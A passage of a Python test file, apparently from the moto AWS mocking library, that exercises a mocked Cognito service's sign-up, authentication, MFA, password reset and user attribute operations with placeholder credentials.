ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) res = conn.forgot_password(ClientId=client_id, Username=username) confirmation_code = res["ResponseMetadata"]["HTTPHeaders"][ "x-moto-forgot-password-confirmation-code" ] confirmation_code.should.match(r"moto-confirmation-code:[0-9]{6}", re.I) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=confirmation_code, Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification_invalid_confirmation_code(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode="moto-confirmation-code:123invalid", Password=str(uuid.uuid4()), ) err = 
ex.value.response["Error"] err["Code"].should.equal("ExpiredCodeException") err["Message"].should.equal("Invalid code provided, please request a code again.") @mock_cognitoidp def test_admin_user_global_sign_out(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username=result["username"], ) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Refresh Token has been revoked") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_userpool(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId="n/a", Username=result["username"], ) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_user(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username="n/a", ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_update_user_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, ], ) conn.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "Jane"}, ], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) attributes = user["UserAttributes"] attributes.should.be.a(list) for attr in attributes: val = attr["Value"] if attr["Name"] == "family_name": val.should.equal("Doe") elif attr["Name"] == "given_name": val.should.equal("Jane") @mock_cognitoidp def test_admin_delete_user_attributes(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "foo", "AttributeDataType": "String", "Mutable": True, "Required": False, } ], )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, {"Name": "custom:foo", "Value": "bar"}, ], ) conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserAttributes"].should.have.length_of(3) # family_name, given_name and sub user["UserAttributes"].should.contain({"Name": "family_name", "Value": "Doe"}) user["UserAttributes"].should.contain({"Name": "given_name", "Value": "John"}) user["UserAttributes"].should_not.contain({"Name": "nickname", "Value": "Joe"}) 
user["UserAttributes"].should_not.contain({"Name": "custom:foo", "Value": "bar"}) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_attribute(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, ], ) with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Invalid user attributes: user.custom:foo: Attribute does not exist in the schema.\n" ) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=str(uuid.uuid4()), UserAttributeNames=["nickname"], ) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_resource_server(): client = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) res = client.create_user_pool(PoolName=name) user_pool_id = res["UserPool"]["Id"] identifier = "http://localhost.localdomain" name = "local server" scopes = [ {"ScopeName": "app:write", "ScopeDescription": "write scope"}, {"ScopeName": "app:read", "ScopeDescription": "read scope"}, ] res = client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) res["ResourceServer"]["UserPoolId"].should.equal(user_pool_id) res["ResourceServer"]["Identifier"].should.equal(identifier) res["ResourceServer"]["Name"].should.equal(name) res["ResourceServer"]["Scopes"].should.equal(scopes) with pytest.raises(ClientError) as ex: client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) ex.value.operation_name.should.equal("CreateResourceServer") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "%s already exists in user pool %s." 
% (identifier, user_pool_id) ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) with pytest.raises(ClientError) as err: # Attempt to add user again result = conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("InvalidParameterException") username = "test@example.com" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none username = "+123456789" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) # Add initial user conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as err: # Attempt to add user again conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("UsernameExistsException") @mock_cognitoidp def test_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_confirm_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, 
ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_REFRESH_TOKEN(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": result["username"], "PASSWORD": result["password"]}, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["RefreshToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_not_found(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) 
with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": "INVALIDUSER", "PASSWORD": result["password"]}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_incorrect_password(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={ "USERNAME": result["username"], "PASSWORD": "NotAuthorizedException", }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": password}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotConfirmedException") @mock_cognitoidp def test_initiate_auth_for_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) except conn.exceptions.UserNotConfirmedException: caught = True caught.should.be.true @mock_cognitoidp def test_initiate_auth_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.describe_user_pool_client(UserPoolId=user_pool_id, ClientId=client_id) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) invalid_secret_hash = str(uuid.uuid4()) caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true 
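# The SECRET_HASH sent in the AuthParameters above is re-derived inline in several
# tests as Base64(HMAC-SHA256(key=client_secret, msg=username + client_id)).
# A minimal consolidation sketch, not part of the original suite; the helper name
# `_cognito_secret_hash` is hypothetical.
def _cognito_secret_hash(username, client_id, client_secret):
    key = bytes(str(client_secret).encode("latin-1"))
    msg = bytes(str(username + client_id).encode("latin-1"))
    new_digest = hmac.new(key, msg, hashlib.sha256).digest()
    return base64.b64encode(new_digest).decode()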
@mock_cognitoidp def test_setting_mfa(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) conn.verify_software_token( AccessToken=result["access_token"], UserCode="123456" ) conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) result = conn.admin_get_user( UserPoolId=result["user_pool_id"], Username=result["username"] ) result["UserMFASettingList"].should.have.length_of(1) @mock_cognitoidp def test_setting_mfa_when_token_not_verified(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) caught = False try: conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) except conn.exceptions.InvalidParameterException: caught = True caught.should.be.true @mock_cognitoidp def test_respond_to_auth_challenge_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) valid_secret_hash = result["secret_hash"] invalid_secret_hash = str(uuid.uuid4()) challenge = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": result["username"], "SRP_A": uuid.uuid4().hex, "SECRET_HASH": valid_secret_hash, }, ) challenge = conn.respond_to_auth_challenge( ClientId=result["client_id"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": challenge["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": result["username"], }, ) caught = False try: conn.respond_to_auth_challenge( ClientId=result["client_id"], Session=challenge["Session"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": result["username"], "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_set_user_password(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) conn.admin_set_user_password( UserPoolId=user_pool_id, Username=username, Password=password, Permanent=True ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) @mock_cognitoidp def test_change_password_with_invalid_token_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.change_password( AccessToken=str(uuid.uuid4()), PreviousPassword="previous_password", ProposedPassword="newer_password", ) ex.value.response["Error"]["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def 
test_confirm_forgot_password_with_non_existent_client_id_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.confirm_forgot_password( ClientId="non-existent-client-id", Username="not-existent-username", ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) ex.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_reset_password_and_change_password(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) temporary_pass = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_pass ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) # User should be in RESET_REQUIRED state after reset client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("RESET_REQUIRED") # Return to CONFIRMED status after NEW_PASSWORD_REQUIRED auth challenge auth_result = client.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": temporary_pass}, ) password = "Admin123!" auth_result = client.respond_to_auth_challenge( Session=auth_result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") # Return to CONFIRMED after user-initated password change client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) client.change_password( AccessToken=auth_result["AuthenticationResult"]["AccessToken"], PreviousPassword=password, ProposedPassword="Admin1234!", ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_reset_password_disabled_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create disabled user client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.admin_disable_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User is disabled") @mock_cognitoidp def test_admin_reset_password_unconfirmed_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create user in status FORCE_CHANGE_PASSWORD client.admin_create_user( UserPoolId=user_pool_id, 
Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User password cannot be reset in the current state.") @mock_cognitoidp def test_admin_reset_password_no_verified_notification_channel(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user without verified email or phone client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Cannot reset password for the user as there is no registered/verified email or phone_number" ) @mock_cognitoidp def test_admin_reset_password_multiple_invocations(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) for _ in range(3): try: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) user = client.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("RESET_REQUIRED") except ClientError: pytest.fail("Shouldn't throw error on consecutive invocations") # Test will retrieve public key from cognito.amazonaws.com/.well-known/jwks.json, # which isnt mocked in ServerMode if not settings.TEST_SERVER_MODE: @mock_cognitoidp def test_idtoken_contains_kid_header(): # https://github.com/spulec/moto/issues/3078 # Setup cognito = boto3.client("cognito-idp", "us-west-2") user_pool_id = cognito.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"][ "Id" ] client = cognito.create_user_pool_client( UserPoolId=user_pool_id, ExplicitAuthFlows=[ "ALLOW_ADMIN_USER_PASSWORD_AUTH", "ALLOW_REFRESH_TOKEN_AUTH", "ALLOW_ADMIN_NO_SRP_AUTH", ], AllowedOAuthFlows=["code", "implicit"], ClientName=str(uuid.uuid4()), CallbackURLs=["https://example.com"], ) client_id = client["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) temporary_password = "1TemporaryP@ssword" cognito.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, ) result = cognito.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": 
temporary_password},
        )

        # A newly created user is forced to set a new password
        # This sets a new password and logs the user in (creates tokens)
        password = "1F@kePassword"
        result = cognito.respond_to_auth_challenge(
            Session=result["Session"],
            ClientId=client_id,
            ChallengeName="NEW_PASSWORD_REQUIRED",
            ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password},
        )
        id_token = result["AuthenticationResult"]["IdToken"]

        # Verify the KID header is present in the token, and corresponds to the KID supplied by the public JWT
        verify_kid_header(id_token)

    def verify_kid_header(token):
        """Verifies that the kid header corresponds with the public key"""
        headers = jwt.get_unverified_headers(token)
        kid = headers["kid"]

        key_index = -1
        keys = fetch_public_keys()
        for i in range(len(keys)):
            if kid == keys[i]["kid"]:
                key_index = i
                break
        if key_index == -1:
            raise Exception("Public key (kid) not found in jwks.json")

    def fetch_public_keys():
        keys_url = "https://cognito-idp.{}.amazonaws.com/{}/.well-known/jwks.json".format(
            "us-west-2", "someuserpoolid"
        )
        response = requests.get(keys_url).json()
        return response["keys"]
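    # Hedged usage sketch (not part of the original tests): the fetched JWKS keys can
    # also be used to check the token signature itself, the same way
    # test_token_legitimacy does with the bundled jwks-public.json. The helper name
    # `_verify_signature` is hypothetical.
    def _verify_signature(token, keys):
        kid = jwt.get_unverified_headers(token)["kid"]
        matching = [key for key in keys if key["kid"] == kid]
        if not matching:
            raise Exception("Public key (kid) not found in jwks.json")
        # jws.verify raises if the signature does not match the supplied key
        return json.loads(jws.verify(token, matching[0], "RS256"))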
